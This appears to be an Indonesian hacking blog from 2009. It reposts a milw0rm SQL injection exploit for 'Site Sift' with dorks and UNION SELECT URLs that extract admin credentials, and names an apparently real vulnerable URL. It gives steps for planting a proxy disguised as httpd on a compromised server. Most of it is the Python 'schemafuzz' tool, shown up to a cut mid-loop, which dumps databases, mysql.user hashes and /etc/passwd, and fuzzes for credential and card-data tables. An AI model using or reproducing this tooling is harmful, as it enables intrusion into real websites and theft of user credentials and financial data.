Minggu, 29 Maret 2009

Site Sift scripts SQL Injection

##############################################
# #
# powered by Site Sift scripts SQL Injection #
# #
##############################################


###########################################
#
# DORK 1 : powered by Site Sift
#
# DORK 2 : allinurl: "index php go addpage"
#
# DORK 2 : allinurl: "index.php?go=detail id="
#
###########################################
EXPLOiT 1:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

EXPLOİT 2:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*


ADMiN LOGiN::admin/login.php

note: i hacked sex and porn sites :(( but not changed pass

# milw0rm.com [2008-04-06]


http://www.mjetclub.com/news.php?idnews=%27162

Sabtu, 28 Maret 2009

Cara Buat Proxy pake tool proxy

Cara Buat Proxy pake tool proxy.tgz.

1. Cari tempat yg ada permission 777 ato drwxrwxrwx ato jalan satu² kita upload ada di /tmp, Kalo dah ketemu Upload tool ke dalam injekan itu.

Disini saia coba di folder cache untuk upload tool nya.

2. tar zxvf proxy.tgz

ketik command tar zxvf proxy.tgz di Run command

hasilnya

3. masuk ke folder pro

rubah work directory nya jadi /home/coastal

/public_html/cache/pro ( awalnya /home/coastal/public_html/cache )

4. ./xh -s "/usr/sbin/httpd" ./prox -a -d -p8888

ketik command ./xh -s "/usr/sbin/httpd" ./prox -a -d -p8888 di Run command, 8888 itu adalah port proxy kita

Dah selesai, kita tes aja di channel pake bot biar kita tau proxynya bisa ato ndak.

Ok, Proxy dah selesai selamat brosing aja mana US lage proxynya wkwkwkkww :P~

Coded Phyton ( Schema Fuzz )

#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ www.v3n0m.net #
################################################################
# MySQL Injection Schema, Dataext, and fuzzer

# Share the c0de!

# Yogyacarderlink Team
# www.v3n0m.com
# ryan@v3n0m.net

# Greetz to
# lingah, LeQhi, IdioT_InsiDe, aRiee, yoga0400, pKi, g0nz, jali-, Anak_Naga, badkiddies, Broken_hack, ulga
# and the yogyacarderlink@Dal.net crew

# NOTES:
# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

# BE WARNED, THIS TOOL IS VERY LOUD..

#Set default evasion options here
arg_end = "--"
arg_eva = "+"

#colMax variable for column Finder
colMax = 205
#Fill in the tables you want tested here.
fuzz_tables = ['tbladmins', 'sort', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser', 'art', 'article_admin', 'articles', 'artikel', '\xc3\x83\xc3\x9c\xc3\x82\xc3\xab', 'aut', 'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'images', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logins', 'logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users', 'member', 'memberlist', 'members', 'minibbtable_users', 'mitglieder', 'movie', 'movies', 'mybb_users', 'mysql', 'mysql.user', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_authors', 'nuke_bbconfig', 'nuke_config', 'nuke_popsettings', 'nuke_users', '\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user', 'user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights', 'users', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'ACT_INFO', 'ActiveDataFeed', 'Category', 'CategoryGroup', 'ChicksPass', 'ClickTrack', 'Country', 'CountryCodes1', 'CustomNav', 'DataFeedPerformance1', 'DataFeedPerformance2', 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 'dtproperties', 'Event', 'Event_backup', 'Event_Category', 'EventRedirect', 'Events_new', 'Genre', 'JamPass', 'MyTicketek', 'MyTicketekArchive', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected', 'Promotion', 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 'ProxyPriceInfo', 'Region', 'SearchOptions', 'Series', 'Sheldonshows', 'StateList', 'States', 'SubCategory', 'Subjects', 'Survey', 'SurveyAnswer', 'SurveyAnswerOpen', 'SurveyQuestion', 'SurveyRespondent', 'sysconstraints', 'syssegments', 'tblRestrictedPasswords', 'tblRestrictedShows', 'Ticket System Acc Numbers', 'TimeDiff', 'Titles', 'ToPacmail1', 'ToPacmail2', 'Total Members', 'UserPreferences', 'uvw_Category', 'uvw_Pref', 'uvw_Preferences', 'Venue', 'venues', 'VenuesNew', 'X_3945', 'stone list', 'tblArtistCategory', 'tblArtists', 'tblConfigs', 'tblLayouts', 'tblLogBookAuthor', 'tblLogBookEntry', 'tblLogBookImages', 'tblLogBookImport', 'tblLogBookUser', 'tblMails', 'tblNewCategory', 'tblNews', 'tblOrders', 'tblStoneCategory', 'tblStones', 'tblUser', 'tblWishList', 'VIEW1', 'viewLogBookEntry', 'viewStoneArtist', 'vwListAllAvailable', 'CC_info', 'CC_username', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'cc_info', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin', 'Admins', 'Login', 'Logins']
#Fill in the columns you want tested here.
fuzz_columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack', 'customer', 'customers', 'cvvnumber]', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']

import urllib, sys, re, os, socket, httplib, urllib2, time, random

#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'

#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
print "\n|---------------------------------------------------------------|"
print "| v3n0m[at]yogyacarderlink.Dal.net v5.0 |"
print "| 6/2008 schemafuzz.py |"
print "| -MySQL v5+ Information_schema Database Enumeration |"
print "| -MySQL v4+ Data Extractor |"
print "| -MySQL v4+ Table & Column Fuzzer |"
print "| Usage: schemafuzz.py [options] |"
print "| -h help v3n0m.net |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)


#help option
for arg in sys.argv:
if arg == "-h":
print " Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --dbs Shows all databases user has access too. MySQL v5+"
print "\tDefine: --schema Enumerate Information_schema Database. MySQL v5+"
print "\tDefine: --full Enumerates all databases information_schema table MySQL v5+"
print "\tDefine: --dump Extract information from a Database, Table and Column. MySQL v4+"
print "\tDefine: --fuzz Fuzz Tables and Columns. MySQL v4+"
print "\tDefine: --findcol Finds Columns length of a SQLi MySQL v4+"
print "\tDefine: --info Gets MySQL server configuration only. MySQL v4+"
print "\n\tRequired:"
print "\tDefine: -u URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print "\n\tMode dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default is schemafuzzlog.txt"
print "\tDefine: -r row number to start at"
print "\tDefine: -v Verbosity off option. Will not display row #'s in dump mode."
print "\n Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print " Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print " Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200"
print " Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password"
print " Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt"
print " Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\""
sys.exit(1)

#define varablies
site = ""
dbt = "schemafuzzlog.txt"
proxy = "None"
count = 0
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_row = "Rows"
arg_verbose = 1
darkc0de = "concat(0x1e,0x1e,"
mode = "None"
line_URL = ""
count_URL = ""
gets = 0
cur_db = ""
cur_table = ""
table_num = 0
terminal = ""
num = 0


#Check args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "--full":
mode = arg
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--fuzz":
mode = arg
arg_fuzz = sys.argv[count]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "--findcol":
mode = arg
arg_findcol = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "-end":
arg_end = sys.argv[count+1]
if arg_end == "--":
arg_eva = "+"
else:
arg_eva = "/**/"
elif arg == "-r":
num = sys.argv[count+1]
table_num = num
elif arg == "-v":
arg_verbose = sys.argv[count]
arg_verbose = 0
count+=1

#Title write
file = open(dbt, "a")
print "\n|---------------------------------------------------------------|"
print "| v3n0m[at]yogyacarderlink.Dal.net v5.0 |"
print "| 6/2008 schemafuzz.py |"
print "| -MySQL v5+ Information_schema Database Enumeration |"
print "| -MySQL v4+ Data Extractor |"
print "| -MySQL v4+ Table & Column Fuzzer |"
print "| Usage: schemafuzz.py [options] |"
print "| -h help www.v3n0m.net |"
print "|---------------------------------------------------------------|"
file.write("\n|---------------------------------------------------------------|")
file.write("\n| v3n0m[at]yogyacarderlink.Dal.net v5.0 |")
file.write("\n| 6/2008 schemafuzz.py |")
file.write("\n| -MySQL v5+ Information_schema Database Enumeration |")
file.write("\n| -MySQL v4+ Data Extractor |")
file.write("\n| -MySQL v4+ Table & Column Fuzzer |")
file.write("\n| Usage: schemafuzz.py [options] |")
file.write("\n| -h help www.v3n0m.net |")
file.write("\n|---------------------------------------------------------------|")

#Arg Error Checking
if site == "":
print "\n[-] Must include -u flag and specify a mode."
print "[-] For help -h\n"
sys.exit(1)
if mode == "None":
print "\n[-] Mode must be specified --schema, --dbs, --dump, --fuzz, --info, --full, --findcol."
print "[-] For help -h\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "[-] Must include -D flag!"
print "[-] For Help -h\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
print "[-] For help -h\n"
sys.exit(1)
if mode != "--findcol" and site.find("darkc0de") == -1:
print "\n[-] Site must contain \'darkc0de\'\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if arg_columns != "None":
arg_columns = arg_columns.split(",")
if site[:7] != "http://":
site = "http://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')

#Getting the URL ready with the evasion options we selected
site = site.replace("+",arg_eva)
site = site.replace("/**/",arg_eva)
print "\n[+] URL:",site+arg_end
file.write("\n\n[+] URL:"+site+arg_end+"\n")
print "[+] Evasion Used:","\""+arg_eva+"\" \""+arg_end+"\""
file.write("[+] Evasion Used: \""+str(arg_eva)+"\" \""+str(arg_end)+"\"")
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))

#Build proxy list
socket.setdefaulttimeout(20)
proxy_list = []
if proxy != "None":
file.write("\n[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
gets+=1
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete"
file.write("\n[+] Proxy List Complete")
else:
print "[-] Proxy Not Given"
file.write("\n[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener())
proxy_num = 0
proxy_len = len(proxy_list)

#colFinder
if mode == "--findcol":
print "[+] Attempting To find the number of columns..."
file.write("\n[+] Attempting To find the number of columns...")
print "[+] Testing: ",
file.write("\n[+] Testing: ",)
checkfor=[]
sitenew = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva
makepretty = ""
for x in xrange(0,colMax):
try:
sys.stdout.write("%s," % (x))
file.write(str(x)+",")
sys.stdout.flush()
darkc0de = "dark"+str(x)+"c0de"
checkfor.append(darkc0de)
if x > 0:
sitenew += ","
sitenew += "0x"+darkc0de.encode("hex")
finalurl = sitenew+arg_end
gets+=1
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(finalurl).read()
for y in checkfor:
colFound = re.findall(y,source)
if len(colFound) >= 1:
print "\n[+] Column Length is:",len(checkfor)
file.write("\n[+] Column Length is: "+str(len(checkfor)))
nullcol = re.findall(("\d+"),y)
print "[+] Found null column at column #:",nullcol[0]
file.write("\n[+] Found null column at column #: "+nullcol[0])
for z in xrange(0,len(checkfor)):
if z > 0:
makepretty += ","
makepretty += str(z)
site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty
print "[+] SQLi URL:",site+arg_end
file.write("\n[+] SQLi URL: "+site+arg_end)
site = site.replace(","+nullcol[0]+",",",darkc0de,")
site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
site = site.replace(","+nullcol[0],",darkc0de")
print "[+] darkc0de URL:",site
file.write("\n[+] darkc0de URL: "+site)
print "[-] Done!\n"
file.write("\n[-] Done!\n")
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

print "\n[!] Sorry Column Length could not be found."
file.write("\n[!] Sorry Column Length could not be found.")
print "[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!"
print "[-] Done\n"
sys.exit(1)

#Retireve version:user:database
head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
print "[+] Gathering MySQL Server Configuration..."
file.write("\n[+] Gathering MySQL Server Configuration...\n")

while 1:
try:
gets+=1
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
# Uncomment the following lines to debug issues with gathering server information
# print head_URL
# print source
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
version = match[0]
user = match[1]
database = match[2]
print "\tDatabase:", database
print "\tUser:", user
print "\tVersion:", version
file.write("\tDatabase: "+database+"\n")
file.write("\tUser: "+user+"\n")
file.write("\tVersion: "+version)
version = version[0]
break
else:
print "[-] No Data Found"
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
proxy_num+=1

# Do we have Access to MySQL database and Load_File
if mode == "--info":
head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
gets+=1
proxy_num+=1
#print "Debug:",head_URL
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall("darkc0de",source)
if len(match) >= 1:
yesno = "Yes <-- w00t w00t"
else:
yesno = "No"
print "\n[+] Do we have Access to MySQL Database:",yesno
file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
if yesno == "Yes <-- w00t w00t":
print "[!]",site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
file.write("\n[!] "+site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end)
gets+=1
proxy_num+=1
head_URL = site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
#print "Debug:",head_URL
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall("root:x:",source)
match = re.findall("root:*:",source)
if len(match) >= 1:
yesno = "Yes <-- w00t w00t"
else:
yesno = "No"
print "\n[+] Do we have Access to Load_File:",yesno
file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
if yesno == "Yes <-- w00t w00t":
print "[!]",site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
file.write("\n[!] "+site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end)

#lets check what we can do based on version
if mode == "--schema" or mode == "--dbs" or mode == "--full":
if int(version) == 4:
print "\n[-] --schema, --dbs and --full can only be used on MySQL v5+ servers!"
print "[-] -h for help"
sys.exit(1)
#Build URLS
if mode == "--schema":
if arg_database != "None" and arg_table == "None":
print "[+] Showing Tables & Columns from database \""+arg_database+"\""
file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.tables"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")+arg_end
arg_row = "Tables"
if arg_database != "None" and arg_table != "None":
print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
line_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
count_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")+arg_end
arg_row = "Columns"
elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
print "[+] and Column(s) "+str(arg_columns)
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
file.write("\n[+] Column(s) "+str(arg_columns))
for column in arg_columns:
darkc0de += column+",0x1e,"
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table+arg_end
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table
if int(version) == 4:
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+arg_table+arg_end
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+arg_table
elif mode == "--full":
print "[+] Starting full SQLi information_schema enumeration..."
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns+"+arg_eva+"WHERE"+arg_eva+"table_schema!=0x"+"information_schema".encode("hex")

elif mode == "--dbs":
print "[+] Showing all databases current user has access too!"
file.write("\n[+] Showing all databases current user has access too!")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")+arg_end
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")
arg_row = "Databases"
line_URL += arg_eva+"LIMIT"+arg_eva+"NUM,1"+arg_end

#Uncomment the lines below to debug issues with the line_URL or count_URL
#print "URL for Counting rows in column:",count_URL
#print "URL for exploit:",line_URL

#Fuzz table/columns
if mode == "--fuzz":
print "[+] Number of tables names to be fuzzed:",len(fuzz_tables)
file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
print "[+] Number of column names to be fuzzed:",len(fuzz_columns)
file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
print "[+] Searching for tables and columns..."
file.write("\n[+] Searching for tables and columns...")
fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"TABLE"+arg_end
for table in fuzz_tables:
try:
proxy_num+=1
table_URL = fuzz_URL.replace("TABLE",table)
gets+=1
#print "[!] Table Debug:",table_URL
source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
e = re.findall("darkc0de", source)
if len(e) > 0:
print "\n[!] Found a table called:",table
file.write("\n\n[+] Found a table called: "+str(table))
print "\n[+] Now searching for columns inside table \""+table+"\""
file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
for column in fuzz_columns:
try:
proxy_num+=1
gets+=1
#print "[!] Column Debug:",table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")
source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")).read()
e = re.findall("darkc0de",source)
if len(e) > 0:
print "[!] Found a column called:",column
file.write("\n[!] Found a column called:"+column)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "[-] Done searching inside table \""+table+"\" for columns!"
file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

#Lets Count how many rows or columns
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
source = proxy_list[proxy_num % proxy_len].open(count_URL).read()
match = re.findall("\x1e\x1e\S+",source)
match = match[0][2:].split("\x1e")
row_value = match[0]
print "[+] Number of "+arg_row+": "+row_value
file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
if mode == "--schema" or mode == "--full" or mode == "--dbs":
print
##Schema Enumeration and DataExt loop
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
while int(table_num) != int(row_value)+1:
#print "table#:",table_num,"row#:",row_value
try:
proxy_num+=1
gets+=1
#print line_URL
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
if mode == "--schema" or mode == "--full":
